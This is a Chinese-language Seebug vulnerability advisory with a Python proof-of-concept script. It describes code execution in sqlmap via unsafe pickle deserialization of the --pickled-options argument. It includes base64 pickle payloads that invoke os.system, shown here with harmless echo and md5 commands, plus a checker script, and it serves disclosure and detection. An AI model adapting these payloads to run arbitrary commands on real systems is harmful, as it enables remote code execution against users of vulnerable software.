Sqlmap 代码执行

基本字段

漏洞编号：: SSV-90021

披露/发现时间：: 2015-01-28

提交时间：: 2015-12-09

漏洞等级：

漏洞类别：: 代码执行

影响组件：

漏洞作者：: 知道创宇404安全实验室

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 13KB

### 前言于2015年01月27日，我在阅读最新版本Sqlmap代码时，发现其存在代码执行问题。安全问题由 python 的 pickle 导致。 pickle 模块实现了一个基础而强劲的算法，用于序列化和反序列化 Python 对象结构，常用于跨平台及网络应用。在进行反序列化操作时，pickle 会执行精心构造的 python 代码。 ### 漏洞演示测试数据: ``` python sqlmap.py --pickled-options "Y29zCnN5c3RlbQooUydlY2hvICJcblxuXG4g77yN77yN77yN77yN77yN77yN77yN77yN77yN77yN77yN77yN77yN77yN77yN77yN77yN77yN77yN77yN77yN77yN77yN77yN77yN77yNXG4gfCAgICAgICAgICAgICAgICDmnaXnpZ7or53miJDlsLHkurrnlJ/moqbmg7PvvIEgICAgICAgICAgICAgIHxcbiB8ICAgICAgICAgICAgICAgICAgc3JjQHhteXRoLm9yZyAgICAgICAgICAgICAgICAgICB8XG4gfCAgICAgICAgICAgICAgICDnjqnmvI/mtJ7lrabmioDmnK/mi7/njrDph5HvvIEgICAgICAgICAgICAgIHxcbiB8ICAgICAgICAgICAgICAgICAgd3d3LnNlYnVnLm5ldCAgICAgICAgICAgICAgICAgICB8XG4gfCAgICAgICAgICAgICAgICDkuIpp5pil56eL5a2m5Lmg572R57uc5a6J5YWo77yBICAgICAgICAgICAgIHxcbiB8ICAgICAgICAgICAgICAgICAgd3d3LmljaHVucWl1LmNvbSAgICAgICAgICAgICAgICB8XG4gfCAgICAgICAgICAgICAgICDliLDnm5jlj6TloZHpgKDotorni7HlpKfnpZ4hICAgICAgICAgICAgICAgfFxuIHwgICAgICAgICAgICAgICAgICBockBwd256ZW4uY29tICAgICAgICAgICAgICAgICAgIHxcbiB8ICAgICAgICAgICAgICBfX19fICAgIF9fICAgICAgICAgICAgICAgICAgICAgICAgICB8XG4gfCAgICAgICAgICAgICAvIF9fL19fIC8gLyAgX18gX19fX18gXyAgICAgICAgICAgICAgfFxuIHwgICAgICAgICAgICBfXCBcLyAtXykgXyBcLyAvLyAvIF8gIC8gICAgICAgICAgICAgIHxcbiB8ICAgICAgICAgICAvX19fL1xfXy9fLl9fL1xfLF8vXF8sIC8gICAgICAgICAgICAgICB8XG4gfCAgICAgICAgICAgICAgICAgICAgICAgICAgICAvX19fLyAgICAgICAgICAgICAgICAgfFxuIO+8je+8je+8je+8je+8je+8je+8je+8je+8je+8je+8je+8je+8je+8je+8je+8je+8je+8je+8je+8je+8je+8je+8je+8je+8je+8jVxuIicKdFIuCg==" ``` 测试结果： ![](https://images.seebug.org/1449640419576) ### 代码分析存在代码执行问题的代码文件如下: <table align="center"> <tr><th>代码文件</th><th>具体代码</th></tr> <tr><td>./thirdparty/bottle/bottle.py:2209:</td><td>return pickle.loads(base64.b64decode(msg))</td></tr> <tr><td>./lib/core/bigarray.py:79:</td><td>self.chunks[-1] = pickle.load(fp)</td></tr> <tr><td>./lib/core/bigarray.py:112:</td><td>self.cache = Cache(index, pickle.load(fp), False)</td></tr> <tr><td>./lib/core/convert.py:70:</td><td>retVal = pickle.loads(base64decode(value))</td></tr> <tr><td>./lib/core/convert.py:72:</td><td>retVal = pickle.loads(base64decode(bytes(value)))</td></tr> </table> 以 **/path/to/sqlmap/lib/core/convert.py** 文件中的 base64unpickle 函数为例, 进行说明。经过分析，我们可以清晰了解，恶意数据可通过参数--pickled-options传入Sqlmap，流程如下: ![](https://images.seebug.org/1449640821951) 恶意数据通过参数 **--pickled-options** 传入 base64unpickle，函数解码数据时，执行Python代码。 ![](https://images.seebug.org/1449640882430) ### pickle 漏洞触发演示: ![](https://images.seebug.org/1449640940830) 演示视频： http://video.weibo.com/show?fid=1034:4cbd333b0bf3af1de46ea99660b9a8b5 ### 推荐: https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdf https://docs.python.org/2/library/pickle.html https://blog.nelhage.com/2011/03/exploiting-pickle/

等 13 兑换了

PoC (非 pocsuite 插件)

贡献者匿名共获得 3KB

#!/usr/bin/env python # coding:utf-8 # Author: Anonymous ''' 测试前先 git checkout decab66 python 90021.py 然后是sqlmap 的路径 ''' import sys import os import subprocess import platform import time import signal class TimeoutError(Exception): pass def command(cmd, timeout=5): """Run command and return the output cmd - the command to run timeout - max seconds to wait for """ is_linux = platform.system() == 'Linux' p = subprocess.Popen( cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid if is_linux else None) t_beginning = time.time() seconds_passed = 0 while True: if p.poll() is not None: break seconds_passed = time.time() - t_beginning if timeout and seconds_passed > timeout: if is_linux: os.killpg(p.pid, signal.SIGTERM) else: p.terminate() return p.stdout.read() # raise TimeoutError(cmd, timeout) time.sleep(0.1) return p.stdout.read() def main(): args = sys.argv if len(args) < 2: print "Usage: python %s [sqlmap path]" % (args[0]) sys.exit(0) sqlmap_path = args[1] if os.path.isfile(sqlmap_path): sqlmap_path = os.path.dirname(sqlmap_path) sqlmap_path = os.path.join(sqlmap_path, 'sqlmap.py') if not os.path.isfile(sqlmap_path): print "%s is not sqlmap path." % (args[1]) sys.exit(1) payload = 'python %s --pickled-options "Y29zCnN5c3RlbQooUydtZDUgLXMgc2VidWcnCnRSLg=="' % ( sqlmap_path) try: # res = commands.getstatusoutput(payload) # 不加超时要手动输入一个回车才有结果 res = command(payload, 1) data = res if '7140eb5b0d8013717ae7cc815f5eedc7' in data: print "sqlmap is vulnerable" else: print "sqlmap is not vulnerable" sys.exit(0) except Exception, e: raise e if __name__ == '__main__': main()